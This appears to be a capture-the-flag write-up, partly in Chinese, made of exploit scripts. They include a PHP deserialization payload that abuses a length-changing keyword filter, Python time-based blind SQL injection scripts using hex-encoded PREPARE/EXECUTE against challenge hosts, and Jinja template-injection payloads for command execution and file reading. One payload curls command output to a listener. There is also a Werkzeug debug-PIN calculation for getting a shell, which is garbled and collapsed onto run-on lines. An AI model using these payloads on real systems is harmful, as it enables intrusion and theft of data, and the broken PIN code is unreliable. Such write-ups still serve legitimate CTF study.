<?php

declare(strict_types=1);

/**
 * Keyword filter the challenge applies to a serialized string before storing it.
 *
 * Every denylisted token is rewritten to the literal 'hacker'. Because the
 * replacement differs in length from the tokens it replaces, the s:N:"..."
 * length prefixes inside serialized data no longer describe their contents
 * once the string has passed through here. A filter guarding serialize()/
 * unserialize() data must reject the input, never rewrite it in place.
 *
 * @param string $parm input to filter
 * @return string filtered input
 */
function safe($parm)
{
    $denylist = ['union', 'regexp', 'load', 'into', 'flag', 'file', 'insert', "'", '\\', '*', 'alter'];

    return str_replace($denylist, 'hacker', $parm);
}

// The four classes below are presumably copied from the target application
// so that serialize() reproduces the same property layout. Property order
// matters for the serialized output and is kept as found.

class User
{
    public $id;
    public $age = 'select password,password from user where username!=?';
    public $nickname = null;
}

class Info
{
    public $age;
    public $nickname = "a";
    public $CtrlCase;
}

class UpdateHelper
{
    public $id;
    public $newinfo;
    public $sql;
}

class dbCtrl
{
    // Connection settings live in property defaults here; in real code they
    // belong in configuration, not in a class that can be (de)serialized.
    public $hostname = "127.0.0.1";
    public $dbuser = "noob123";
    public $dbpass = "noob123";
    public $database = "noob123";
    public $name = '1';
    public $password = 2;
    public $mysqli;
    public $token = "admin";
}

// Nest the objects: Info -> UpdateHelper -> User -> Info -> dbCtrl.
$ctrl = new dbCtrl();
$inner = new Info();
$inner->CtrlCase = $ctrl;
$user = new User();
$user->nickname = $inner;
$helper = new UpdateHelper();
$helper->sql = $user;
$outer = new Info();
$outer->CtrlCase = $helper;

$serialized = serialize($outer);
// The chain must survive the filter unchanged; none of its bytes hit the denylist.
assert($serialized === safe($serialized));

// Drop the first 47 bytes of the serialized form and prefix one 'union' per
// remaining byte, then write the result out for the author to submit.
$tail = substr($serialized, 47);
$padded = str_repeat('union', strlen($tail)) . $tail;
file_put_contents('out.txt', $padded);
import requests
from Crypto.Util.number import long_to_bytes, bytes_to_long
from libnum import s2n
import string
import re

url = "http://e0bac4dbfc61452b906f16cacbe31e9bfe43db0e990f4ace.changame.ichunqiu.com/"

# Local copy of the keyword filter each probe is checked against before it is
# sent (case-insensitive). Only ever consulted via .match() -- see gen().
pattern = re.compile(
    r"union|select|mid|substr|and|or|sleep|benchmark|join|limit|#|-|\^|&|database",
    re.I,
)


def gen(payload, pos, num):
    """Build the ``id`` query value for one probe.

    ``payload`` is a format string with two ``%d`` slots (character position
    and comparison threshold). The formatted statement is turned into a hex
    literal with libnum's ``s2n`` and wrapped in a SET / PREPARE / EXECUTE
    sequence, so the filtered keywords do not appear literally in what is
    sent. Prints "match" and exits the process if the local filter matches.

    Review note: the guard can never fire as written -- ``re.match`` only
    tries offset 0 and the value always starts with ``%bf%27``; ``search``
    was presumably intended. Left unchanged to preserve behaviour. Server
    side, keyword filtering is not the mitigation for this class of issue;
    bound parameters and refusing PREPARE from client-controlled strings are.
    """
    statement = payload % (pos, num)
    encoded = hex(s2n(statement))
    value = f"%bf%27;SET @x={encoded};PREPARE xx FROM @x;EXECUTE xx;/*"
    if pattern.match(value):
        print("match")
        exit(0)
    return value
def exp():
    """Recover one value character by character from response timing.

    For each position the interval [32, 128) is bisected. A request that
    returns within the 2 s timeout means the server took the ``0`` branch
    (character above ``mid``); a timeout means ``sleep(4)`` ran (at or below
    ``mid``). The payload reads the string reversed, so each recovered
    character is prepended. The running result is printed per position.

    The bare ``except`` treats any error, not only a timeout, as the slow
    branch. From a monitoring view this is a burst of near-identical requests
    whose latencies cluster around the sleep threshold.
    """
    payload = "select if((ascii(substr(reverse((select fllllll4g from pdotest.table1)),%d,1))>%d),0,sleep(4));"
    recovered = ""
    for pos in range(1, 60):
        low, high = 32, 128
        guess = (low + high) // 2
        while high > low:
            probe = gen(payload, pos, guess)
            try:
                requests.get(url + "?id=" + probe, timeout=2)
            except:  # deliberately broad: mirrors the original heuristic
                high = guess
            else:
                low = guess + 1
            guess = (low + high) // 2
        recovered = chr(guess) + recovered
        print(recovered)
if __name__ == "__main__":
    # Single-threaded run; the pooled variant further down is the faster one.
    exp()
改进了一个多线程版本, 一分钟不到就可以注出结果
import requests
from libnum import s2n
import string
import re
from multiprocessing.pool import ThreadPool

url = "http://e0bac4dbfc61452b906f16cacbe31e9bfe43db0e990f4ace.changame.ichunqiu.com/"

# Local copy of the keyword filter (case-insensitive); only used via .match().
pattern = re.compile(
    r"union|select|mid|substr|and|or|sleep|benchmark|join|limit|#|-|\^|&|database",
    re.I,
)

# One slot per character position; workers write into it concurrently.
# Plain list assignment is atomic under the GIL, so no lock is taken.
res = [""] * 60


def gen(payload, pos, num):
    """Build the ``id`` query value for one probe.

    ``payload`` has two ``%d`` slots (position, threshold). The formatted
    statement becomes a hex literal via ``s2n`` inside a SET / PREPARE /
    EXECUTE sequence. Prints "match" and exits if the local filter matches.

    Review note: ``re.match`` anchors at offset 0 and the value always begins
    with ``%bf%27``, so this check never fires; ``search`` was presumably
    meant. Unchanged here to preserve behaviour.
    """
    statement = payload % (pos, num)
    encoded = hex(s2n(statement))
    value = f"%bf%27;SET @x={encoded};PREPARE xx FROM @x;EXECUTE xx;/*"
    if pattern.match(value):
        print("match")
        exit(0)
    return value
def exp(i):
    """Worker for one character position ``i``; does nothing for ``i == 0``.

    Bisects [32, 128) using response timing: a reply within the 2 s timeout
    means the character is above the guess, a timeout (or any other error,
    because the ``except`` is bare) means at or below. The payload reads the
    string in natural order, so the result goes into the shared ``res`` list
    at index ``i`` and the joined list is printed. Prints from several pool
    workers may interleave.
    """
    payload = "select if((ascii(substr(((select fllllll4g from pdotest.table1)),%d,1))>%d),0,sleep(4));"
    if not i:
        return
    low, high = 32, 128
    guess = (low + high) // 2
    while high > low:
        probe = gen(payload, i, guess)
        try:
            requests.get(url + "?id=" + probe, timeout=2)
        except:  # deliberately broad: mirrors the original heuristic
            high = guess
        else:
            low = guess + 1
        guess = (low + high) // 2
    res[i] = chr(guess)
    print("".join(res))
if __name__ == "__main__":
    # Five workers; position 0 is dispatched too, but exp() ignores it.
    pool = ThreadPool(5)
    for pos in range(45):
        pool.apply_async(exp, args=(pos,))
    pool.close()
    pool.join()
# Jinja-style template probe quoted as found in the writeup; "ip:9000" is a
# placeholder for the author's listener. The server-side fix is to never
# render user-supplied text as template source (render it as data instead,
# or use a sandboxed environment).
payload = (
    "{% if [].__class__.__base__.__subclasses__()[127]"
    ".__init__.__globals__['sys'+'tem']('curl http://ip:9000/`ls`') %}"
    "2{% endif %}"
)
顺带一提, 当时 ls 后的结果不全, 不知道是否有截断, 可以使用
ls -r
反序输出
debug 界面使用 pin 码 getshell
根据上面安全客的文章, 但是一直没算对, 脚本如下, 主要的点在于
获取 machineid 的地方发生了更新, 这里应该使用
读文件的 payload 如下
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
先获取需要的几个参数, 然后再计算一下, 就可以 getshell 了
import requests from base64 import b64encode
url = "http://182.92.243.154:10002/"

# Template that reads a file from the target; the literal "filename" is a
# placeholder the helper functions below substitute before posting. Same
# root cause as above: user input rendered as template source.
payload = (
    "{% for c in [].__class__.__base__.__subclasses__() %}"
    "{% if c.__name__=='catch_warnings' %}"
    "{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}"
    "{% endif %}{% endfor %}"
)
h = hashlib.md5() for bit in chain(probably_public_bits, private_bits): ifnot bit: continue if isinstance(bit, str): bit = bit.encode('utf-8') h.update(bit) h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None if num isNone: h.update(b'pinsalt') num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None if rv isNone: for group_size in5, 4, 3: if len(num) % group_size == 0: rv = '-'.join(num[x:x + group_size].rjust(group_size, '0') for x in range(0, len(num), group_size)) break else: rv = num
return rv defgetnet(): file = "/sys/class/net/eth0/address" data = { "text":b64encode(payload.replace("filename", file).encode()) } res = requests.post(f"{url}decode", data=data).text import re res = re.findall("结果.+", res)[0][-17:] return add2str(res) defgetmachine(): file = "/proc/self/cgroup" data = { "text":b64encode(payload.replace("filename", file).encode()) } res = requests.post(f"{url}decode", data=data).text import re res = re.findall("结果.+", res)[0][22:] return res defreadfile(name): data = { "text":b64encode(payload.replace("filename", name).encode()) } res = requests.post(f"{url}decode", data=data).text import re # res = re.findall("结果.+", res, re.MULTILINE) print(res) print(b64encode(payload.replace("filename", name).encode()))
// Express app bootstrap. Only the requires are on this page; route wiring,
// the pug view setup and the multer upload handling are not shown here.
var express = require("express");
var app = express();
var fs = require("fs");
var path = require("path");
var http = require("http");
var pug = require("pug");
var morgan = require("morgan");
const multer = require("multer");
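/**
 * Substring denylist for a user-controlled value. The call site is not on
 * this page; presumably it guards request input before it reaches the
 * template/route code. Matching is case-sensitive and literal.
 *
 * A denylist like this only raises the bar; escaping per output context
 * (or an allowlist of expected values) is the actual control.
 *
 * @param {string} url  value to inspect
 * @returns {boolean}   true when any denylisted token occurs in url
 */
function blacklist(url) {
  const evilwords = [
    "global",
    "process",
    "mainModule",
    "require",
    "root",
    "child_process",
    "exec",
    '"',
    "'",
    "!",
  ];
  // Always return a boolean: the original fell off the end and yielded
  // undefined on a clean input, which passes an if() but not a === check.
  return evilwords.some((word) => url.includes(word));
}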
// No host is given, so Node binds every interface on 8081; pass "127.0.0.1"
// as the second argument if only local access is intended.
var server = app.listen(8081, () => {
  const { address: host, port } = server.address();
  console.log("Example app listening at http://%s:%s", host, port);
});